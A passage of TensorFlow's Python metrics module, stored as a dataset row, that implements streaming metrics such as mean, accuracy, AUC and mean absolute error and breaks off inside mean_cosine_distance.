code
stringlengths 1
25.8M
| language
stringclasses 18
values | source
stringclasses 4
values | repo
stringclasses 78
values | path
stringlengths 0
268
|
|---|---|---|---|---|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implementation of tf.metrics module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.compat import compat
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import confusion_matrix
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import sets
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import weights_broadcast_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import distribution_strategy_context
from tensorflow.python.util.deprecation import deprecated
from tensorflow.python.util.tf_export import tf_export
def metric_variable(shape, dtype, validate_shape=True, name=None):
"""Create variable in `GraphKeys.(LOCAL|METRIC_VARIABLES)` collections.
If running in a `DistributionStrategy` context, the variable will be
"replica local". This means:
* The returned object will be a container with separate variables
per replica of the model.
* When writing to the variable, e.g. using `assign_add` in a metric
update, the update will be applied to the variable local to the
replica.
* To get a metric's result value, we need to sum the variable values
across the replicas before computing the final answer. Furthermore,
the final answer should be computed once instead of in every
replica. Both of these are accomplished by running the computation
of the final result value inside
`distribution_strategy_context.get_replica_context().merge_call(fn)`.
Inside the `merge_call()`, ops are only added to the graph once
and access to a replica-local variable in a computation returns
the sum across all replicas.
Args:
shape: Shape of the created variable.
dtype: Type of the created variable.
validate_shape: (Optional) Whether shape validation is enabled for
the created variable.
name: (Optional) String name of the created variable.
Returns:
A (non-trainable) variable initialized to zero, or if inside a
`DistributionStrategy` scope a replica-local variable container.
"""
# Note that synchronization "ON_READ" implies trainable=False.
return variable_scope.variable(
lambda: array_ops.zeros(shape, dtype),
collections=[
ops.GraphKeys.LOCAL_VARIABLES, ops.GraphKeys.METRIC_VARIABLES
],
validate_shape=validate_shape,
synchronization=variable_scope.VariableSynchronization.ON_READ,
aggregation=variable_scope.VariableAggregation.SUM,
name=name)
def _remove_squeezable_dimensions(predictions, labels, weights):
"""Squeeze or expand last dim if needed.
Squeezes last dim of `predictions` or `labels` if their rank differs by 1
(using confusion_matrix.remove_squeezable_dimensions).
Squeezes or expands last dim of `weights` if its rank differs by 1 from the
new rank of `predictions`.
If `weights` is scalar, it is kept scalar.
This will use static shape if available. Otherwise, it will add graph
operations, which could result in a performance hit.
Args:
predictions: Predicted values, a `Tensor` of arbitrary dimensions.
labels: Optional label `Tensor` whose dimensions match `predictions`.
weights: Optional weight scalar or `Tensor` whose dimensions match
`predictions`.
Returns:
Tuple of `predictions`, `labels` and `weights`. Each of them possibly has
the last dimension squeezed, `weights` could be extended by one dimension.
"""
predictions = ops.convert_to_tensor(predictions)
if labels is not None:
labels, predictions = confusion_matrix.remove_squeezable_dimensions(
labels, predictions)
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
if weights is None:
return predictions, labels, None
weights = ops.convert_to_tensor(weights)
weights_shape = weights.get_shape()
weights_rank = weights_shape.ndims
if weights_rank == 0:
return predictions, labels, weights
predictions_shape = predictions.get_shape()
predictions_rank = predictions_shape.ndims
if (predictions_rank is not None) and (weights_rank is not None):
# Use static rank.
if weights_rank - predictions_rank == 1:
weights = array_ops.squeeze(weights, [-1])
elif predictions_rank - weights_rank == 1:
weights = array_ops.expand_dims(weights, [-1])
else:
# Use dynamic rank.
weights_rank_tensor = array_ops.rank(weights)
rank_diff = weights_rank_tensor - array_ops.rank(predictions)
def _maybe_expand_weights():
return control_flow_ops.cond(
math_ops.equal(rank_diff, -1),
lambda: array_ops.expand_dims(weights, [-1]), lambda: weights)
# Don't attempt squeeze if it will fail based on static check.
if ((weights_rank is not None) and
(not weights_shape.dims[-1].is_compatible_with(1))):
maybe_squeeze_weights = lambda: weights
else:
maybe_squeeze_weights = lambda: array_ops.squeeze(weights, [-1])
def _maybe_adjust_weights():
return control_flow_ops.cond(
math_ops.equal(rank_diff, 1), maybe_squeeze_weights,
_maybe_expand_weights)
# If weights are scalar, do nothing. Otherwise, try to add or remove a
# dimension to match predictions.
weights = control_flow_ops.cond(
math_ops.equal(weights_rank_tensor, 0), lambda: weights,
_maybe_adjust_weights)
return predictions, labels, weights
def _maybe_expand_labels(labels, predictions):
"""If necessary, expand `labels` along last dimension to match `predictions`.
Args:
labels: `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels] or [D1, ... DN]. The latter implies
num_labels=1, in which case the result is an expanded `labels` with shape
[D1, ... DN, 1].
predictions: `Tensor` with shape [D1, ... DN, num_classes].
Returns:
`labels` with the same rank as `predictions`.
Raises:
ValueError: if `labels` has invalid shape.
"""
with ops.name_scope(None, 'expand_labels', (labels, predictions)) as scope:
labels = sparse_tensor.convert_to_tensor_or_sparse_tensor(labels)
# If sparse, expand sparse shape.
if isinstance(labels, sparse_tensor.SparseTensor):
return control_flow_ops.cond(
math_ops.equal(
array_ops.rank(predictions),
array_ops.size(labels.dense_shape) + 1),
lambda: sparse_ops.sparse_reshape( # pylint: disable=g-long-lambda
labels,
shape=array_ops.concat((labels.dense_shape, (1,)), 0),
name=scope),
lambda: labels)
# Otherwise, try to use static shape.
labels_rank = labels.get_shape().ndims
if labels_rank is not None:
predictions_rank = predictions.get_shape().ndims
if predictions_rank is not None:
if predictions_rank == labels_rank:
return labels
if predictions_rank == labels_rank + 1:
return array_ops.expand_dims(labels, -1, name=scope)
raise ValueError(
'Unexpected labels shape %s for predictions shape %s.' %
(labels.get_shape(), predictions.get_shape()))
# Otherwise, use dynamic shape.
return control_flow_ops.cond(
math_ops.equal(array_ops.rank(predictions),
array_ops.rank(labels) + 1),
lambda: array_ops.expand_dims(labels, -1, name=scope), lambda: labels)
def _safe_div(numerator, denominator, name):
"""Divides two tensors element-wise, returning 0 if the denominator is <= 0.
Args:
numerator: A real `Tensor`.
denominator: A real `Tensor`, with dtype matching `numerator`.
name: Name for the returned op.
Returns:
0 if `denominator` <= 0, else `numerator` / `denominator`
"""
if compat.forward_compatible(2018, 11, 1):
return math_ops.div_no_nan(numerator, denominator)
t = math_ops.truediv(numerator, denominator)
zero = array_ops.zeros_like(t, dtype=denominator.dtype)
condition = math_ops.greater(denominator, zero)
zero = math_ops.cast(zero, t.dtype)
return array_ops.where(condition, t, zero, name=name)
def _safe_scalar_div(numerator, denominator, name):
"""Divides two values, returning 0 if the denominator is 0.
Args:
numerator: A scalar `float64` `Tensor`.
denominator: A scalar `float64` `Tensor`.
name: Name for the returned op.
Returns:
0 if `denominator` == 0, else `numerator` / `denominator`
"""
numerator.get_shape().with_rank_at_most(1)
denominator.get_shape().with_rank_at_most(1)
return _safe_div(numerator, denominator, name=name)
def _streaming_confusion_matrix(labels, predictions, num_classes, weights=None):
"""Calculate a streaming confusion matrix.
Calculates a confusion matrix. For estimation over a stream of data,
the function creates an `update_op` operation.
Args:
labels: A `Tensor` of ground truth labels with shape [batch size] and of
type `int32` or `int64`. The tensor will be flattened if its rank > 1.
predictions: A `Tensor` of prediction results for semantic labels, whose
shape is [batch size] and type `int32` or `int64`. The tensor will be
flattened if its rank > 1.
num_classes: The possible number of labels the prediction task can
have. This value must be provided, since a confusion matrix of
dimension = [num_classes, num_classes] will be allocated.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
Returns:
total_cm: A `Tensor` representing the confusion matrix.
update_op: An operation that increments the confusion matrix.
"""
# Local variable to accumulate the predictions in the confusion matrix.
total_cm = metric_variable(
[num_classes, num_classes], dtypes.float64, name='total_confusion_matrix')
# Cast the type to int64 required by confusion_matrix_ops.
predictions = math_ops.to_int64(predictions)
labels = math_ops.to_int64(labels)
num_classes = math_ops.to_int64(num_classes)
# Flatten the input if its rank > 1.
if predictions.get_shape().ndims > 1:
predictions = array_ops.reshape(predictions, [-1])
if labels.get_shape().ndims > 1:
labels = array_ops.reshape(labels, [-1])
if (weights is not None) and (weights.get_shape().ndims > 1):
weights = array_ops.reshape(weights, [-1])
# Accumulate the prediction to current confusion matrix.
current_cm = confusion_matrix.confusion_matrix(
labels, predictions, num_classes, weights=weights, dtype=dtypes.float64)
update_op = state_ops.assign_add(total_cm, current_cm)
return total_cm, update_op
def _aggregate_across_replicas(metrics_collections, metric_value_fn, *args):
"""Aggregate metric value across replicas."""
def fn(distribution, *a):
"""Call `metric_value_fn` in the correct control flow context."""
if hasattr(distribution, '_outer_control_flow_context'):
# If there was an outer context captured before this method was called,
# then we enter that context to create the metric value op. If the
# caputred context is `None`, ops.control_dependencies(None) gives the
# desired behavior. Else we use `Enter` and `Exit` to enter and exit the
# captured context.
# This special handling is needed because sometimes the metric is created
# inside a while_loop (and perhaps a TPU rewrite context). But we don't
# want the value op to be evaluated every step or on the TPU. So we
# create it outside so that it can be evaluated at the end on the host,
# once the update ops have been evaluted.
# pylint: disable=protected-access
if distribution._outer_control_flow_context is None:
with ops.control_dependencies(None):
metric_value = metric_value_fn(distribution, *a)
else:
distribution._outer_control_flow_context.Enter()
metric_value = metric_value_fn(distribution, *a)
distribution._outer_control_flow_context.Exit()
# pylint: enable=protected-access
else:
metric_value = metric_value_fn(distribution, *a)
if metrics_collections:
ops.add_to_collections(metrics_collections, metric_value)
return metric_value
return distribution_strategy_context.get_replica_context().merge_call(
fn, *args)
@tf_export('metrics.mean')
def mean(values,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the (weighted) mean of the given values.
The `mean` function creates two local variables, `total` and `count`
that are used to compute the average of `values`. This average is ultimately
returned as `mean` which is an idempotent operation that simply divides
`total` by `count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the `mean`.
`update_op` increments `total` with the reduced sum of the product of `values`
and `weights`, and it increments `count` with the reduced sum of `weights`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
values: A `Tensor` of arbitrary dimensions.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`values`, and must be broadcastable to `values` (i.e., all dimensions must
be either `1`, or the same as the corresponding `values` dimension).
metrics_collections: An optional list of collections that `mean`
should be added to.
updates_collections: An optional list of collections that `update_op`
should be added to.
name: An optional variable_scope name.
Returns:
mean: A `Tensor` representing the current mean, the value of `total` divided
by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately and whose value matches `mean_value`.
Raises:
ValueError: If `weights` is not `None` and its shape doesn't match `values`,
or if either `metrics_collections` or `updates_collections` are not a list
or tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.mean is not supported when eager execution '
'is enabled.')
with variable_scope.variable_scope(name, 'mean', (values, weights)):
values = math_ops.to_float(values)
total = metric_variable([], dtypes.float32, name='total')
count = metric_variable([], dtypes.float32, name='count')
if weights is None:
num_values = math_ops.to_float(array_ops.size(values))
else:
values, _, weights = _remove_squeezable_dimensions(
predictions=values, labels=None, weights=weights)
weights = weights_broadcast_ops.broadcast_weights(
math_ops.to_float(weights), values)
values = math_ops.multiply(values, weights)
num_values = math_ops.reduce_sum(weights)
update_total_op = state_ops.assign_add(total, math_ops.reduce_sum(values))
with ops.control_dependencies([values]):
update_count_op = state_ops.assign_add(count, num_values)
def compute_mean(_, t, c):
return _safe_div(t, math_ops.maximum(c, 0), name='value')
mean_t = _aggregate_across_replicas(
metrics_collections, compute_mean, total, count)
update_op = _safe_div(update_total_op,
math_ops.maximum(update_count_op, 0),
name='update_op')
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return mean_t, update_op
@tf_export('metrics.accuracy')
def accuracy(labels,
predictions,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Calculates how often `predictions` matches `labels`.
The `accuracy` function creates two local variables, `total` and
`count` that are used to compute the frequency with which `predictions`
matches `labels`. This frequency is ultimately returned as `accuracy`: an
idempotent operation that simply divides `total` by `count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the `accuracy`.
Internally, an `is_correct` operation computes a `Tensor` with elements 1.0
where the corresponding elements of `predictions` and `labels` match and 0.0
otherwise. Then `update_op` increments `total` with the reduced sum of the
product of `weights` and `is_correct`, and it increments `count` with the
reduced sum of `weights`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: The ground truth values, a `Tensor` whose shape matches
`predictions`.
predictions: The predicted values, a `Tensor` of any shape.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that `accuracy` should
be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
accuracy: A `Tensor` representing the accuracy, the value of `total` divided
by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately and whose value matches `accuracy`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.accuracy is not supported when eager '
'execution is enabled.')
predictions, labels, weights = _remove_squeezable_dimensions(
predictions=predictions, labels=labels, weights=weights)
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
if labels.dtype != predictions.dtype:
predictions = math_ops.cast(predictions, labels.dtype)
is_correct = math_ops.to_float(math_ops.equal(predictions, labels))
return mean(is_correct, weights, metrics_collections, updates_collections,
name or 'accuracy')
def _confusion_matrix_at_thresholds(labels,
predictions,
thresholds,
weights=None,
includes=None):
"""Computes true_positives, false_negatives, true_negatives, false_positives.
This function creates up to four local variables, `true_positives`,
`true_negatives`, `false_positives` and `false_negatives`.
`true_positive[i]` is defined as the total weight of values in `predictions`
above `thresholds[i]` whose corresponding entry in `labels` is `True`.
`false_negatives[i]` is defined as the total weight of values in `predictions`
at most `thresholds[i]` whose corresponding entry in `labels` is `True`.
`true_negatives[i]` is defined as the total weight of values in `predictions`
at most `thresholds[i]` whose corresponding entry in `labels` is `False`.
`false_positives[i]` is defined as the total weight of values in `predictions`
above `thresholds[i]` whose corresponding entry in `labels` is `False`.
For estimation of these metrics over a stream of data, for each metric the
function respectively creates an `update_op` operation that updates the
variable and returns its value.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` whose shape matches `predictions`. Will be cast to
`bool`.
predictions: A floating point `Tensor` of arbitrary shape and whose values
are in the range `[0, 1]`.
thresholds: A python list or tuple of float thresholds in `[0, 1]`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
includes: Tuple of keys to return, from 'tp', 'fn', 'tn', fp'. If `None`,
default to all four.
Returns:
values: Dict of variables of shape `[len(thresholds)]`. Keys are from
`includes`.
update_ops: Dict of operations that increments the `values`. Keys are from
`includes`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
`includes` contains invalid keys.
"""
all_includes = ('tp', 'fn', 'tn', 'fp')
if includes is None:
includes = all_includes
else:
for include in includes:
if include not in all_includes:
raise ValueError('Invalid key: %s.' % include)
with ops.control_dependencies([
check_ops.assert_greater_equal(
predictions,
math_ops.cast(0.0, dtype=predictions.dtype),
message='predictions must be in [0, 1]'),
check_ops.assert_less_equal(
predictions,
math_ops.cast(1.0, dtype=predictions.dtype),
message='predictions must be in [0, 1]')
]):
predictions, labels, weights = _remove_squeezable_dimensions(
predictions=math_ops.to_float(predictions),
labels=math_ops.cast(labels, dtype=dtypes.bool),
weights=weights)
num_thresholds = len(thresholds)
# Reshape predictions and labels.
predictions_2d = array_ops.reshape(predictions, [-1, 1])
labels_2d = array_ops.reshape(
math_ops.cast(labels, dtype=dtypes.bool), [1, -1])
# Use static shape if known.
num_predictions = predictions_2d.get_shape().as_list()[0]
# Otherwise use dynamic shape.
if num_predictions is None:
num_predictions = array_ops.shape(predictions_2d)[0]
thresh_tiled = array_ops.tile(
array_ops.expand_dims(array_ops.constant(thresholds), [1]),
array_ops.stack([1, num_predictions]))
# Tile the predictions after thresholding them across different thresholds.
pred_is_pos = math_ops.greater(
array_ops.tile(array_ops.transpose(predictions_2d), [num_thresholds, 1]),
thresh_tiled)
if ('fn' in includes) or ('tn' in includes):
pred_is_neg = math_ops.logical_not(pred_is_pos)
# Tile labels by number of thresholds
label_is_pos = array_ops.tile(labels_2d, [num_thresholds, 1])
if ('fp' in includes) or ('tn' in includes):
label_is_neg = math_ops.logical_not(label_is_pos)
if weights is not None:
weights = weights_broadcast_ops.broadcast_weights(
math_ops.to_float(weights), predictions)
weights_tiled = array_ops.tile(
array_ops.reshape(weights, [1, -1]), [num_thresholds, 1])
thresh_tiled.get_shape().assert_is_compatible_with(
weights_tiled.get_shape())
else:
weights_tiled = None
values = {}
update_ops = {}
if 'tp' in includes:
true_p = metric_variable(
[num_thresholds], dtypes.float32, name='true_positives')
is_true_positive = math_ops.to_float(
math_ops.logical_and(label_is_pos, pred_is_pos))
if weights_tiled is not None:
is_true_positive *= weights_tiled
update_ops['tp'] = state_ops.assign_add(true_p,
math_ops.reduce_sum(
is_true_positive, 1))
values['tp'] = true_p
if 'fn' in includes:
false_n = metric_variable(
[num_thresholds], dtypes.float32, name='false_negatives')
is_false_negative = math_ops.to_float(
math_ops.logical_and(label_is_pos, pred_is_neg))
if weights_tiled is not None:
is_false_negative *= weights_tiled
update_ops['fn'] = state_ops.assign_add(false_n,
math_ops.reduce_sum(
is_false_negative, 1))
values['fn'] = false_n
if 'tn' in includes:
true_n = metric_variable(
[num_thresholds], dtypes.float32, name='true_negatives')
is_true_negative = math_ops.to_float(
math_ops.logical_and(label_is_neg, pred_is_neg))
if weights_tiled is not None:
is_true_negative *= weights_tiled
update_ops['tn'] = state_ops.assign_add(true_n,
math_ops.reduce_sum(
is_true_negative, 1))
values['tn'] = true_n
if 'fp' in includes:
false_p = metric_variable(
[num_thresholds], dtypes.float32, name='false_positives')
is_false_positive = math_ops.to_float(
math_ops.logical_and(label_is_neg, pred_is_pos))
if weights_tiled is not None:
is_false_positive *= weights_tiled
update_ops['fp'] = state_ops.assign_add(false_p,
math_ops.reduce_sum(
is_false_positive, 1))
values['fp'] = false_p
return values, update_ops
def _aggregate_variable(v, collections):
f = lambda distribution, value: distribution.read_var(value)
return _aggregate_across_replicas(collections, f, v)
@tf_export('metrics.auc')
def auc(labels,
predictions,
weights=None,
num_thresholds=200,
metrics_collections=None,
updates_collections=None,
curve='ROC',
name=None,
summation_method='trapezoidal'):
"""Computes the approximate AUC via a Riemann sum.
The `auc` function creates four local variables, `true_positives`,
`true_negatives`, `false_positives` and `false_negatives` that are used to
compute the AUC. To discretize the AUC curve, a linearly spaced set of
thresholds is used to compute pairs of recall and precision values. The area
under the ROC-curve is therefore computed using the height of the recall
values by the false positive rate, while the area under the PR-curve is the
computed using the height of the precision values by the recall.
This value is ultimately returned as `auc`, an idempotent operation that
computes the area under a discretized curve of precision versus recall values
(computed using the aforementioned variables). The `num_thresholds` variable
controls the degree of discretization with larger numbers of thresholds more
closely approximating the true AUC. The quality of the approximation may vary
dramatically depending on `num_thresholds`.
For best results, `predictions` should be distributed approximately uniformly
in the range [0, 1] and not peaked around 0 or 1. The quality of the AUC
approximation may be poor if this is not the case. Setting `summation_method`
to 'minoring' or 'majoring' can help quantify the error in the approximation
by providing lower or upper bound estimate of the AUC.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the `auc`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` whose shape matches `predictions`. Will be cast to
`bool`.
predictions: A floating point `Tensor` of arbitrary shape and whose values
are in the range `[0, 1]`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
num_thresholds: The number of thresholds to use when discretizing the roc
curve.
metrics_collections: An optional list of collections that `auc` should be
added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
curve: Specifies the name of the curve to be computed, 'ROC' [default] or
'PR' for the Precision-Recall-curve.
name: An optional variable_scope name.
summation_method: Specifies the Riemann summation method used
(https://en.wikipedia.org/wiki/Riemann_sum): 'trapezoidal' [default] that
applies the trapezoidal rule; 'careful_interpolation', a variant of it
differing only by a more correct interpolation scheme for PR-AUC -
interpolating (true/false) positives but not the ratio that is precision;
'minoring' that applies left summation for increasing intervals and right
summation for decreasing intervals; 'majoring' that does the opposite.
Note that 'careful_interpolation' is strictly preferred to 'trapezoidal'
(to be deprecated soon) as it applies the same method for ROC, and a
better one (see Davis & Goadrich 2006 for details) for the PR curve.
Returns:
auc: A scalar `Tensor` representing the current area-under-curve.
update_op: An operation that increments the `true_positives`,
`true_negatives`, `false_positives` and `false_negatives` variables
appropriately and whose value matches `auc`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.auc is not supported when eager execution '
'is enabled.')
with variable_scope.variable_scope(name, 'auc',
(labels, predictions, weights)):
if curve != 'ROC' and curve != 'PR':
raise ValueError('curve must be either ROC or PR, %s unknown' % (curve))
kepsilon = 1e-7 # to account for floating point imprecisions
thresholds = [
(i + 1) * 1.0 / (num_thresholds - 1) for i in range(num_thresholds - 2)
]
thresholds = [0.0 - kepsilon] + thresholds + [1.0 + kepsilon]
values, update_ops = _confusion_matrix_at_thresholds(
labels, predictions, thresholds, weights)
# Add epsilons to avoid dividing by 0.
epsilon = 1.0e-6
def interpolate_pr_auc(tp, fp, fn):
"""Interpolation formula inspired by section 4 of Davis & Goadrich 2006.
Note here we derive & use a closed formula not present in the paper
- as follows:
Modeling all of TP (true positive weight),
FP (false positive weight) and their sum P = TP + FP (positive weight)
as varying linearly within each interval [A, B] between successive
thresholds, we get
Precision = (TP_A + slope * (P - P_A)) / P
with slope = dTP / dP = (TP_B - TP_A) / (P_B - P_A).
The area within the interval is thus (slope / total_pos_weight) times
int_A^B{Precision.dP} = int_A^B{(TP_A + slope * (P - P_A)) * dP / P}
int_A^B{Precision.dP} = int_A^B{slope * dP + intercept * dP / P}
where intercept = TP_A - slope * P_A = TP_B - slope * P_B, resulting in
int_A^B{Precision.dP} = TP_B - TP_A + intercept * log(P_B / P_A)
Bringing back the factor (slope / total_pos_weight) we'd put aside, we get
slope * [dTP + intercept * log(P_B / P_A)] / total_pos_weight
where dTP == TP_B - TP_A.
Note that when P_A == 0 the above calculation simplifies into
int_A^B{Precision.dTP} = int_A^B{slope * dTP} = slope * (TP_B - TP_A)
which is really equivalent to imputing constant precision throughout the
first bucket having >0 true positives.
Args:
tp: true positive counts
fp: false positive counts
fn: false negative counts
Returns:
pr_auc: an approximation of the area under the P-R curve.
"""
dtp = tp[:num_thresholds - 1] - tp[1:]
p = tp + fp
prec_slope = _safe_div(
dtp,
math_ops.maximum(p[:num_thresholds - 1] - p[1:], 0),
name='prec_slope')
intercept = tp[1:] - math_ops.multiply(prec_slope, p[1:])
safe_p_ratio = array_ops.where(
math_ops.logical_and(p[:num_thresholds - 1] > 0, p[1:] > 0),
_safe_div(p[:num_thresholds - 1],
math_ops.maximum(p[1:], 0),
name='recall_relative_ratio'),
array_ops.ones_like(p[1:]))
return math_ops.reduce_sum(
_safe_div(
prec_slope * (dtp + intercept * math_ops.log(safe_p_ratio)),
math_ops.maximum(tp[1:] + fn[1:], 0),
name='pr_auc_increment'),
name='interpolate_pr_auc')
def compute_auc(tp, fn, tn, fp, name):
"""Computes the roc-auc or pr-auc based on confusion counts."""
if curve == 'PR':
if summation_method == 'trapezoidal':
logging.warning(
'Trapezoidal rule is known to produce incorrect PR-AUCs; '
'please switch to "careful_interpolation" instead.')
elif summation_method == 'careful_interpolation':
# This one is a bit tricky and is handled separately.
return interpolate_pr_auc(tp, fp, fn)
rec = math_ops.div(tp + epsilon, tp + fn + epsilon)
if curve == 'ROC':
fp_rate = math_ops.div(fp, fp + tn + epsilon)
x = fp_rate
y = rec
else: # curve == 'PR'.
prec = math_ops.div(tp + epsilon, tp + fp + epsilon)
x = rec
y = prec
if summation_method in ('trapezoidal', 'careful_interpolation'):
# Note that the case ('PR', 'careful_interpolation') has been handled
# above.
return math_ops.reduce_sum(
math_ops.multiply(x[:num_thresholds - 1] - x[1:],
(y[:num_thresholds - 1] + y[1:]) / 2.),
name=name)
elif summation_method == 'minoring':
return math_ops.reduce_sum(
math_ops.multiply(x[:num_thresholds - 1] - x[1:],
math_ops.minimum(y[:num_thresholds - 1], y[1:])),
name=name)
elif summation_method == 'majoring':
return math_ops.reduce_sum(
math_ops.multiply(x[:num_thresholds - 1] - x[1:],
math_ops.maximum(y[:num_thresholds - 1], y[1:])),
name=name)
else:
raise ValueError('Invalid summation_method: %s' % summation_method)
# sum up the areas of all the trapeziums
def compute_auc_value(_, values):
return compute_auc(values['tp'], values['fn'], values['tn'], values['fp'],
'value')
auc_value = _aggregate_across_replicas(
metrics_collections, compute_auc_value, values)
update_op = compute_auc(update_ops['tp'], update_ops['fn'],
update_ops['tn'], update_ops['fp'], 'update_op')
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return auc_value, update_op
@tf_export('metrics.mean_absolute_error')
def mean_absolute_error(labels,
predictions,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the mean absolute error between the labels and predictions.
The `mean_absolute_error` function creates two local variables,
`total` and `count` that are used to compute the mean absolute error. This
average is weighted by `weights`, and it is ultimately returned as
`mean_absolute_error`: an idempotent operation that simply divides `total` by
`count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`mean_absolute_error`. Internally, an `absolute_errors` operation computes the
absolute value of the differences between `predictions` and `labels`. Then
`update_op` increments `total` with the reduced sum of the product of
`weights` and `absolute_errors`, and it increments `count` with the reduced
sum of `weights`
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` of the same shape as `predictions`.
predictions: A `Tensor` of arbitrary shape.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that
`mean_absolute_error` should be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
mean_absolute_error: A `Tensor` representing the current mean, the value of
`total` divided by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately and whose value matches `mean_absolute_error`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.mean_absolute_error is not supported '
'when eager execution is enabled.')
predictions, labels, weights = _remove_squeezable_dimensions(
predictions=predictions, labels=labels, weights=weights)
absolute_errors = math_ops.abs(predictions - labels)
return mean(absolute_errors, weights, metrics_collections,
updates_collections, name or 'mean_absolute_error')
@tf_export('metrics.mean_cosine_distance')
def mean_cosine_distance(labels,
predictions,
dim,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the cosine distance between the labels and predictions.
The `mean_cosine_distance` function creates two local variables,
`total` and `count` that are used to compute the average cosine distance
between `predictions` and `labels`. This average is weighted by `weights`,
and it is ultimately returned as `mean_distance`, which is an idempotent
operation that simply divides `total` by `count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`mean_distance`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` of arbitrary shape.
predictions: A `Tensor` of the same shape as `labels`.
dim: The dimension along which the cosine distance is computed.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension). Also,
dimension `dim` must be `1`.
metrics_collections: An optional list of collections that the metric
value variable should be added to.
updates_collections: An optional list of collections that the metric update
ops should be added to.
name: An optional variable_scope name.
Returns:
mean_distance: A `Tensor` representing the current mean, the value of
`total` divided by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.mean_cosine_distance is not supported when '
'eager execution is enabled.')
predictions, labels, weights = _remove_squeezable_dimensions(
predictions=predictions, labels=labels, weights=weights)
radial_diffs = math_ops.multiply(predictions, labels)
radial_diffs = math_ops.reduce_sum(
radial_diffs, reduction_indices=[
dim,
], keepdims=True)
